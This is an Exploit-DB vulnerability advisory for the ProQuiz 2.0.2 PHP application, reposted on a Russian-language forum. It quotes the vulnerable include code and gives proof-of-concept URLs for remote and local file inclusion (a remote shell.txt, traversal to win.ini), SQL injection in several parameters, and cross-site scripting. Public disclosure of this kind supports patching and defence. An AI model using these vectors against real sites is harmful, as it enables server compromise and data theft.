Exploit ProQuiz 2.0.2 - Multiple Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20421
Проверка EDB
  1. Пройдено
Автор
L0N3LY-H34RT
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2012-08-11
Код:
####################################################
### Exploit Title: ProQuiz v2.0.2 - Multiple Vulnerabilities 
### Date: 18/7/2012 
### Author: L0n3ly-H34rT 
### My Site: http://se3c.blogspot.com/
### Contact: [email protected] 
### Vendor Homepage: http://proquiz.softon.org/ 
### Software Link: http://code.google.com/p/proquiz/downloads/list
### Tested on: Linux/Windows 
####################################################

1- Remote File Include :

* In File (my_account.php) in line 114 & 115 :

if($_GET['action']=='getpage' && !empty($_GET['page'])){
@include_once($_GET['page'].'.php'); 

* P.O.C :

First register and login in your panel and paste that's url e.g. :

http://127.0.0.1/full/my_account.php?action=getpage&page=http://127.0.0.1/shell.txt?

* Note :

Must be allow_url_include=On

-----------------------------------------------------------------------

2- Local File Include :

* In File (my_account.php) in line 114 & 115 :

if($_GET['action']=='getpage' && !empty($_GET['page'])){
@include_once($_GET['page'].'.php'); 

* P.O.C :

First register and login in your panel and paste that's url e.g. :

http://127.0.0.1/full/my_account.php?action=getpage&page=../../../../../../../../../../windows/win.ini%00.jpg

* Note :

Must be magic_quotes_gpc = Off

---------------------------------------------------------------------

3- Remote SQL Injection & Blind SQL Injection :

* In Two Files :

A- First ( answers.php ) in line 55 :

<?php echo $_GET['instid']; ?>

B- Second ( functions.php ) In :

$_POST['email']

$_POST['username']

* P.O.C :

A- First :

http://127.0.0.1/full/answers.php?action=answers&instid=[SQL]

B- Second :

About Email :

In URL:

http://127.0.0.1/full/functions.php?action=recoverpass

Inject Here In POST Method :

email=[SQL]

About Username :

In URL:

http://127.0.0.1/full/functions.php?action=edit_profile&type=username

Inject Here In POST Method :

username=[SQL]

-------------------------------------------------------------------------------------

4 - Cross Site Scripting :

e.g.: http://127.0.0.1/full/answers.php?action=answers&instid=[XSS]

-----------------------------------------------------------------------------------

# Greetz to my friendz

References:

http://se3c.blogspot.com/
http://code.google.com/p/proquiz/downloads/list
 
Источник
www.exploit-db.com

Похожие темы